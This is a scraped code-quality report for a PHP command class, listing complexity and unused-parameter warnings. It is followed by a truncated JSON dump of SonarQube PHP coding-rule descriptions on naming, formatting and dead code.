Showing 275 of 275 total issues
Function execute has a Cognitive Complexity of 20 (exceeds 5 allowed). Consider refactoring. Open
Open
protected function execute(InputInterface $input, OutputInterface $output)
{
/** @var \GuzzleHttp\Client $client */
$client = $this->getContainer()['http-client'];
$language = $input->getArgument('language');- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Method execute has 64 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
protected function execute(InputInterface $input, OutputInterface $output)
{
/** @var \GuzzleHttp\Client $client */
$client = $this->getContainer()['http-client'];
$language = $input->getArgument('language');Avoid too many return statements within this method. Open
Open
return 0;Function createCsv has a Cognitive Complexity of 6 (exceeds 5 allowed). Consider refactoring. Open
Open
private function createCsv($data, $language)
{
ob_start();
$resource = fopen('php://output', 'w');- Read upRead up
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Further reading
Avoid unused parameters such as '$language'. Open
Open
private function createCsv($data, $language)- Read upRead up
- Exclude checks
UnusedFormalParameter
Since: 0.2
Avoid passing parameters to methods or constructors and then not using those parameters.
Example
class Foo
{
private function bar($howdy)
{
// $howdy is not used
}
}Source https://phpmd.org/rules/unusedcode.html#unusedformalparameter
The method execute() has an NPath complexity of 6912. The configured NPath complexity threshold is 200. Open
Open
protected function execute(InputInterface $input, OutputInterface $output)
{
/** @var \GuzzleHttp\Client $client */
$client = $this->getContainer()['http-client'];
$language = $input->getArgument('language');- Read upRead up
- Exclude checks
NPathComplexity
Since: 0.1
The NPath complexity of a method is the number of acyclic execution paths through that method. A threshold of 200 is generally considered the point where measures should be taken to reduce complexity.
Example
class Foo {
function bar() {
// lots of complicated code
}
}Source https://phpmd.org/rules/codesize.html#npathcomplexity
The method execute() has a Cyclomatic Complexity of 16. The configured cyclomatic complexity threshold is 10. Open
Open
protected function execute(InputInterface $input, OutputInterface $output)
{
/** @var \GuzzleHttp\Client $client */
$client = $this->getContainer()['http-client'];
$language = $input->getArgument('language');- Read upRead up
- Exclude checks
CyclomaticComplexity
Since: 0.1
Complexity is determined by the number of decision points in a method plus one for the method entry. The decision points are 'if', 'while', 'for', and 'case labels'. Generally, 1-4 is low complexity, 5-7 indicates moderate complexity, 8-10 is high complexity, and 11+ is very high complexity.
Example
// Cyclomatic Complexity = 11
class Foo {
1 public function example() {
2 if ($a == $b) {
3 if ($a1 == $b1) {
fiddle();
4 } elseif ($a2 == $b2) {
fiddle();
} else {
fiddle();
}
5 } elseif ($c == $d) {
6 while ($c == $d) {
fiddle();
}
7 } elseif ($e == $f) {
8 for ($n = 0; $n < $h; $n++) {
fiddle();
}
} else {
switch ($z) {
9 case 1:
fiddle();
break;
10 case 2:
fiddle();
break;
11 case 3:
fiddle();
break;
default:
fiddle();
break;
}
}
}
}Source https://phpmd.org/rules/codesize.html#cyclomaticcomplexity
BUG found Open
Open
window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n if (condition2) {\n ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 && condition2) {\n ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 && $condition2) || ($condition3 && $condition4)) && $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) && my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n private $foo = 4; \/\/foo is unused\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 42; $i++){} \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n ; \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n echo $p;; \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i <= 10; doSomething($i), $i++); \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n echo $p;\n\n for ($i = 1; $i <= 10; $i++) {\n doSomething($i);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n the first character following the null statement is a white-space character. <\/li>\n <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n that the first character following the null statement is a white-space character. <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n or while condition <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public $myField;\n\n public function doSomething() {\n $myField = 0;\n ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n <li> final or abstract <\/li>\n <li> public or protected or private <\/li>\n <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ? exp : true;\n$booleanVariable = condition ? exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition && exp;\n$booleanVariable = !condition || exp;\n$booleanVariable = condition && exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n return true;\n} else {\n return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n return $numerator \/ $denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n if (condition1) {\n return true;\n } else {\n if (condition2) {\n return false;\n } else {\n return true;\n }\n }\n return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo() {} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n ...\n }\n\n private function unusedPrivateFunction() { \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo(){} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n <li> Some value was left unset. <\/li>\n <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) { \/\/ Noncompliant\n doSomething();\n}\n...\nif (false) { \/\/ Noncompliant\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n case 0: \/\/ 6 lines till next case\n methodCall1();\n methodCall2();\n methodCall3();\n methodCall4();\n break;\n default:\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n case 0:\n doSomething();\n break;\n default:\n break;\n}\n\nfunction doSomething(){\n methodCall1(\"\");\n methodCall2(\"\");\n methodCall3(\"\");\n methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n $LOCAL;\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n $local;\n ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n function doSomething($a, $b) { \/\/ no issue reported on $b\n compute($a);\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect 